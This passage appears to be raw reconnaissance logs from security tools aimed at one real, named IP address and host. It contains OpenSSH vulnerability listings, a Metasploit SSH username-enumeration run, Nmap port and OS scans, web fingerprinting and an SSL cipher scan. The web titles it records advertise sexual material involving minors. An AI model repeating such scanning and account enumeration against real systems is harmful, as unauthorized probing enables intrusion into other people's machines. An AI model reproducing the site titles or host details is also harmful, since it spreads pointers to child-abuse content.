18053| [56921] OpenSSH Unspecified Remote Compromise
18054| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
18055| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
18056| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
18057| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
18058| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
18059| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
18060| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
18061| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
18062| [43745] OpenSSH X11 Forwarding Local Session Hijacking
18063| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
18064| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
18065| [37315] pam_usb OpenSSH Authentication Unspecified Issue
18066| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
18067| [34601] OPIE w/ OpenSSH Account Enumeration
18068| [34600] OpenSSH S/KEY Authentication Account Enumeration
18069| [32721] OpenSSH Username Password Complexity Account Enumeration
18070| [30232] OpenSSH Privilege Separation Monitor Weakness
18071| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
18072| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
18073| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
18074| [29152] OpenSSH Identical Block Packet DoS
18075| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
18076| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
18077| [22692] OpenSSH scp Command Line Filename Processing Command Injection
18078| [20216] OpenSSH with KerberosV Remote Authentication Bypass
18079| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
18080| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
18081| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
18082| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
18083| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
18084| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
18085| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
18086| [6601] OpenSSH *realloc() Unspecified Memory Errors
18087| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
18088| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
18089| [6072] OpenSSH PAM Conversation Function Stack Modification
18090| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
18091| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
18092| [5408] OpenSSH echo simulation Information Disclosure
18093| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
18094| [4536] OpenSSH Portable AIX linker Privilege Escalation
18095| [3938] OpenSSL and OpenSSH /dev/random Check Failure
18096| [3456] OpenSSH buffer_append_space() Heap Corruption
18097| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
18098| [2140] OpenSSH w/ PAM Username Validity Timing Attack
18099| [2112] OpenSSH Reverse DNS Lookup Bypass
18100| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
18101| [1853] OpenSSH Symbolic Link 'cookies' File Removal
18102| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
18103| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
18104| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
18105| [688] OpenSSH UseLogin Environment Variable Local Command Execution
18106| [642] OpenSSH Multiple Key Type ACL Bypass
18107| [504] OpenSSH SSHv2 Public Key Authentication Bypass
18108| [341] OpenSSH UseLogin Local Privilege Escalation
18109|_
18110Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
18111Device type: general purpose|broadband router|WAP|webcam
18112Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
18113OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
18114Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
18115No exact OS matches for host (test conditions non-ideal).
18116Network Distance: 14 hops
18117Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18118
18119TRACEROUTE (using port 22/tcp)
18120HOP RTT ADDRESS
181211 85.53 ms 10.246.204.1
181222 57.80 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
181233 60.21 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
181244 36.72 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
181255 38.16 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
181266 57.89 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
181277 120.89 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
181288 120.91 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
181299 120.92 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
1813010 138.70 ms worldstream.demarc.cogentco.com (149.11.39.42)
1813111 138.65 ms 109.236.95.183
1813212 138.69 ms 190.2.158.153
1813313 138.74 ms 185.106.120.66
1813414 103.54 ms latina.petite.guru (185.82.200.52)
18135######################################################################################################################################
18136USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
18137RHOSTS => 185.82.200.52
18138RHOST => 185.82.200.52
18139[*] 185.82.200.52:22 - SSH - Using malformed packet technique
18140[*] 185.82.200.52:22 - SSH - Starting scan
18141[+] 185.82.200.52:22 - SSH - User 'admin' found
18142[+] 185.82.200.52:22 - SSH - User 'administrator' found
18143[+] 185.82.200.52:22 - SSH - User 'anonymous' found
18144[+] 185.82.200.52:22 - SSH - User 'backup' found
18145[+] 185.82.200.52:22 - SSH - User 'bee' found
18146[+] 185.82.200.52:22 - SSH - User 'ftp' found
18147[+] 185.82.200.52:22 - SSH - User 'guest' found
18148[+] 185.82.200.52:22 - SSH - User 'GUEST' found
18149[+] 185.82.200.52:22 - SSH - User 'info' found
18150[+] 185.82.200.52:22 - SSH - User 'mail' found
18151[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
18152[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
18153[+] 185.82.200.52:22 - SSH - User 'mysql' found
18154[+] 185.82.200.52:22 - SSH - User 'nobody' found
18155[+] 185.82.200.52:22 - SSH - User 'oracle' found
18156[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
18157[+] 185.82.200.52:22 - SSH - User 'postfix' found
18158[+] 185.82.200.52:22 - SSH - User 'postgres' found
18159[+] 185.82.200.52:22 - SSH - User 'private' found
18160[+] 185.82.200.52:22 - SSH - User 'proftpd' found
18161[+] 185.82.200.52:22 - SSH - User 'public' found
18162[+] 185.82.200.52:22 - SSH - User 'root' found
18163[+] 185.82.200.52:22 - SSH - User 'superadmin' found
18164[+] 185.82.200.52:22 - SSH - User 'support' found
18165[+] 185.82.200.52:22 - SSH - User 'sys' found
18166[+] 185.82.200.52:22 - SSH - User 'system' found
18167[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
18168[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
18169[+] 185.82.200.52:22 - SSH - User 'test' found
18170[+] 185.82.200.52:22 - SSH - User 'tomcat' found
18171[+] 185.82.200.52:22 - SSH - User 'user' found
18172[+] 185.82.200.52:22 - SSH - User 'webmaster' found
18173[+] 185.82.200.52:22 - SSH - User 'www-data' found
18174[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
18175[*] Scanned 1 of 1 hosts (100% complete)
18176[*] Auxiliary module execution completed
18177#######################################################################################################################################
18178Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:54 EDT
18179NSE: Loaded 164 scripts for scanning.
18180NSE: Script Pre-scanning.
18181Initiating NSE at 23:54
18182Completed NSE at 23:54, 0.00s elapsed
18183Initiating NSE at 23:54
18184Completed NSE at 23:54, 0.00s elapsed
18185Initiating Parallel DNS resolution of 1 host. at 23:54
18186Completed Parallel DNS resolution of 1 host. at 23:54, 0.02s elapsed
18187Initiating SYN Stealth Scan at 23:54
18188Scanning latina.petite.guru (185.82.200.52) [1 port]
18189Discovered open port 80/tcp on 185.82.200.52
18190Completed SYN Stealth Scan at 23:54, 0.16s elapsed (1 total ports)
18191Initiating Service scan at 23:54
18192Scanning 1 service on latina.petite.guru (185.82.200.52)
18193Completed Service scan at 23:54, 6.24s elapsed (1 service on 1 host)
18194Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18195Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18196Initiating Traceroute at 23:54
18197Completed Traceroute at 23:54, 0.16s elapsed
18198Initiating Parallel DNS resolution of 14 hosts. at 23:54
18199Completed Parallel DNS resolution of 14 hosts. at 23:54, 0.21s elapsed
18200NSE: Script scanning 185.82.200.52.
18201Initiating NSE at 23:54
18202####################################################################################################################################
18203http://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYMPHETS]
18204#####################################################################################################################################
18205
18206wig - WebApp Information Gatherer
18207
18208
18209Scanning http://185.82.200.52...
18210________________________ SITE INFO _________________________
18211IP Title
18212185.82.200.52 MET-ART FREE TEEN GALLERIES BARELY LEGAL E
18213
18214_________________________ VERSION __________________________
18215Name Versions Type
18216Apache 2.4.10 Platform
18217Debian 8.0 | 8.0 (pre-release) OS
18218
18219____________________________________________________________
18220Time: 29.4 sec Urls: 825 Fingerprints: 40401
18221######################################################################################################################################
18222HTTP/1.1 200 OK
18223Date: Sun, 06 Oct 2019 03:54:57 GMT
18224Server: Apache/2.4.10 (Debian)
18225Last-Modified: Fri, 30 Mar 2018 13:05:08 GMT
18226ETag: "331e-568a0e3b68900"
18227Accept-Ranges: bytes
18228Content-Length: 13086
18229Vary: Accept-Encoding
18230Content-Type: text/html
18231
18232HTTP/1.1 200 OK
18233Date: Sun, 06 Oct 2019 03:54:57 GMT
18234Server: Apache/2.4.10 (Debian)
18235Last-Modified: Fri, 30 Mar 2018 13:05:08 GMT
18236ETag: "331e-568a0e3b68900"
18237Accept-Ranges: bytes
18238Content-Length: 13086
18239Vary: Accept-Encoding
18240Content-Type: text/html
18241
18242Allow: GET,HEAD,POST,OPTIONS
18243######################################################################################################################################
18244Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:55 EDT
18245NSE: Loaded 164 scripts for scanning.
18246NSE: Script Pre-scanning.
18247Initiating NSE at 23:55
18248Completed NSE at 23:55, 0.00s elapsed
18249Initiating NSE at 23:55
18250Completed NSE at 23:55, 0.00s elapsed
18251Initiating Parallel DNS resolution of 1 host. at 23:55
18252Completed Parallel DNS resolution of 1 host. at 23:55, 0.02s elapsed
18253Initiating SYN Stealth Scan at 23:55
18254Scanning latina.petite.guru (185.82.200.52) [1 port]
18255Discovered open port 443/tcp on 185.82.200.52
18256Completed SYN Stealth Scan at 23:55, 0.14s elapsed (1 total ports)
18257Initiating Service scan at 23:55
18258Scanning 1 service on latina.petite.guru (185.82.200.52)
18259Completed Service scan at 23:55, 12.74s elapsed (1 service on 1 host)
18260Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18261Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18262Initiating Traceroute at 23:55
18263Completed Traceroute at 23:55, 0.16s elapsed
18264Initiating Parallel DNS resolution of 14 hosts. at 23:55
18265Completed Parallel DNS resolution of 14 hosts. at 23:55, 0.42s elapsed
18266NSE: Script scanning 185.82.200.52.
18267Initiating NSE at 23:55
18268######################################################################################################################################
18269https://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
18270#####################################################################################################################################
18271Version: 1.11.13-static
18272OpenSSL 1.0.2-chacha (1.0.2g-dev)
18273
18274Connected to 185.82.200.52
18275
18276Testing SSL server 185.82.200.52 on port 443 using SNI name 185.82.200.52
18277
18278 TLS Fallback SCSV:
18279Server supports TLS Fallback SCSV
18280
18281 TLS renegotiation:
18282Secure session renegotiation supported
18283
18284 TLS Compression:
18285Compression disabled
18286
18287 Heartbleed:
18288TLS 1.2 not vulnerable to heartbleed
18289TLS 1.1 not vulnerable to heartbleed
18290TLS 1.0 not vulnerable to heartbleed
18291
18292 Supported Server Cipher(s):
18293Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
18294Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
18295Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
18296Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
18297Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
18298Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
18299Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
18300Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
18301Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18302Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18303Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18304Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18305Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18306Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18307Accepted TLSv1.2 256 bits CAMELLIA256-SHA
18308Accepted TLSv1.2 256 bits AES256-SHA
18309Accepted TLSv1.2 128 bits CAMELLIA128-SHA
18310Accepted TLSv1.2 128 bits AES128-SHA
18311Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18312Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18313Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18314Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18315Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18316Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18317Accepted TLSv1.1 256 bits CAMELLIA256-SHA
18318Accepted TLSv1.1 256 bits AES256-SHA
18319Accepted TLSv1.1 128 bits CAMELLIA128-SHA
18320Accepted TLSv1.1 128 bits AES128-SHA
18321Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18322Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18323Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18324Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18325Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18326Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18327Accepted TLSv1.0 256 bits CAMELLIA256-SHA
18328Accepted TLSv1.0 256 bits AES256-SHA
18329Accepted TLSv1.0 128 bits CAMELLIA128-SHA
18330Accepted TLSv1.0 128 bits AES128-SHA
18331
18332 SSL Certificate:
18333Signature Algorithm: sha256WithRSAEncryption
18334RSA Key Strength: 2048
18335
18336Subject: ygmt.info
18337Altnames: DNS:ygmt.info, DNS:www.ygmt.info
18338Issuer: COMODO RSA Domain Validation Secure Server CA
18339
18340Not valid before: Feb 14 00:00:00 2017 GMT
18341Not valid after: Feb 14 23:59:59 2018 GMT
18342#######################################################################################################################################
18343Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:59 EDT
18344NSE: Loaded 47 scripts for scanning.
18345NSE: Script Pre-scanning.
18346Initiating NSE at 23:59
18347Completed NSE at 23:59, 0.00s elapsed
18348Initiating NSE at 23:59
18349Completed NSE at 23:59, 0.00s elapsed
18350Initiating Ping Scan at 23:59
18351Scanning 185.82.200.52 [4 ports]
18352Completed Ping Scan at 23:59, 0.13s elapsed (1 total hosts)
18353Initiating Parallel DNS resolution of 1 host. at 23:59
18354Completed Parallel DNS resolution of 1 host. at 23:59, 0.02s elapsed
18355Initiating SYN Stealth Scan at 23:59
18356Scanning latina.petite.guru (185.82.200.52) [65535 ports]
18357Discovered open port 80/tcp on 185.82.200.52
18358Discovered open port 443/tcp on 185.82.200.52
18359Discovered open port 22/tcp on 185.82.200.52
18360Discovered open port 10000/tcp on 185.82.200.52
18361SYN Stealth Scan Timing: About 11.90% done; ETC: 00:03 (0:03:50 remaining)
18362SYN Stealth Scan Timing: About 17.78% done; ETC: 00:04 (0:04:42 remaining)
18363SYN Stealth Scan Timing: About 23.07% done; ETC: 00:05 (0:05:03 remaining)
18364SYN Stealth Scan Timing: About 31.86% done; ETC: 00:05 (0:04:19 remaining)
18365SYN Stealth Scan Timing: About 44.64% done; ETC: 00:06 (0:03:59 remaining)
18366SYN Stealth Scan Timing: About 53.26% done; ETC: 00:06 (0:03:34 remaining)
18367SYN Stealth Scan Timing: About 59.24% done; ETC: 00:07 (0:03:11 remaining)
18368SYN Stealth Scan Timing: About 65.75% done; ETC: 00:07 (0:02:45 remaining)
18369SYN Stealth Scan Timing: About 71.75% done; ETC: 00:07 (0:02:16 remaining)
18370SYN Stealth Scan Timing: About 77.37% done; ETC: 00:07 (0:01:50 remaining)
18371SYN Stealth Scan Timing: About 82.85% done; ETC: 00:07 (0:01:25 remaining)
18372SYN Stealth Scan Timing: About 88.49% done; ETC: 00:07 (0:00:57 remaining)
18373Completed SYN Stealth Scan at 00:07, 512.54s elapsed (65535 total ports)
18374Initiating Service scan at 00:07
18375Scanning 4 services on latina.petite.guru (185.82.200.52)
18376Completed Service scan at 00:07, 12.90s elapsed (4 services on 1 host)
18377Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18378Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18379Initiating Traceroute at 00:08
18380Completed Traceroute at 00:08, 0.15s elapsed
18381Initiating Parallel DNS resolution of 14 hosts. at 00:08
18382Completed Parallel DNS resolution of 14 hosts. at 00:08, 0.18s elapsed
18383NSE: Script scanning 185.82.200.52.
18384Initiating NSE at 00:08
18385Completed NSE at 00:08, 40.32s elapsed
18386Initiating NSE at 00:08
18387Completed NSE at 00:08, 1.22s elapsed
18388Nmap scan report for latina.petite.guru (185.82.200.52)
18389Host is up (0.12s latency).
18390Not shown: 65531 closed ports
18391PORT STATE SERVICE VERSION
1839222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
18393| vulscan: VulDB - https://vuldb.com:
18394| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
18395| [76326] OpenSSH 6.8 XSECURITY privilege escalation
18396| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
18397| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
18398| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
18399| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
18400|
18401| MITRE CVE - https://cve.mitre.org:
18402| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
18403| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
18404| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
18405| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
18406| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
18407| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
18408|
18409| SecurityFocus - https://www.securityfocus.com/bid/:
18410| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
18411| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
18412| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
18413| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
18414| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
18415| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
18416| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
18417| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
18418| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
18419| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
18420| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
18421| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
18422| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
18423| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
18424| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
18425| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
18426| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
18427| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
18428| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
18429| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
18430| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
18431| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
18432| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
18433| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
18434| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
18435| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
18436| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
18437| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
18438| [75990] OpenSSH Login Handling Security Bypass Weakness
18439| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
18440| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
18441| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
18442| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
18443| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
18444| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
18445| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
18446| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
18447| [61286] OpenSSH Remote Denial of Service Vulnerability
18448| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
18449| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
18450| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
18451| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
18452| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
18453| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
18454| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
18455| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
18456| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
18457| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
18458| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
18459| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
18460| [30794] Red Hat OpenSSH Backdoor Vulnerability
18461| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
18462| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
18463| [28531] OpenSSH ForceCommand Command Execution Weakness
18464| [28444] OpenSSH X Connections Session Hijacking Vulnerability
18465| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
18466| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
18467| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
18468| [20956] OpenSSH Privilege Separation Key Signature Weakness
18469| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
18470| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
18471| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
18472| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
18473| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
18474| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
18475| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
18476| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
18477| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
18478| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
18479| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
18480| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
18481| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
18482| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
18483| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
18484| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
18485| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
18486| [6168] OpenSSH Visible Password Vulnerability
18487| [5374] OpenSSH Trojan Horse Vulnerability
18488| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
18489| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
18490| [4241] OpenSSH Channel Code Off-By-One Vulnerability
18491| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
18492| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
18493| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
18494| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
18495| [2917] OpenSSH PAM Session Evasion Vulnerability
18496| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
18497| [2356] OpenSSH Private Key Authentication Check Vulnerability
18498| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
18499| [1334] OpenSSH UseLogin Vulnerability
18500|
18501| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18502| [83258] GSI-OpenSSH auth-pam.c security bypass
18503| [82781] OpenSSH time limit denial of service
18504| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
18505| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
18506| [72756] Debian openssh-server commands information disclosure
18507| [68339] OpenSSH pam_thread buffer overflow
18508| [67264] OpenSSH ssh-keysign unauthorized access
18509| [65910] OpenSSH remote_glob function denial of service
18510| [65163] OpenSSH certificate information disclosure
18511| [64387] OpenSSH J-PAKE security bypass
18512| [63337] Cisco Unified Videoconferencing OpenSSH weak security
18513| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
18514| [45202] OpenSSH signal handler denial of service
18515| [44747] RHEL OpenSSH backdoor
18516| [44280] OpenSSH PermitRootLogin information disclosure
18517| [44279] OpenSSH sshd weak security
18518| [44037] OpenSSH sshd SELinux role unauthorized access
18519| [43940] OpenSSH X11 forwarding information disclosure
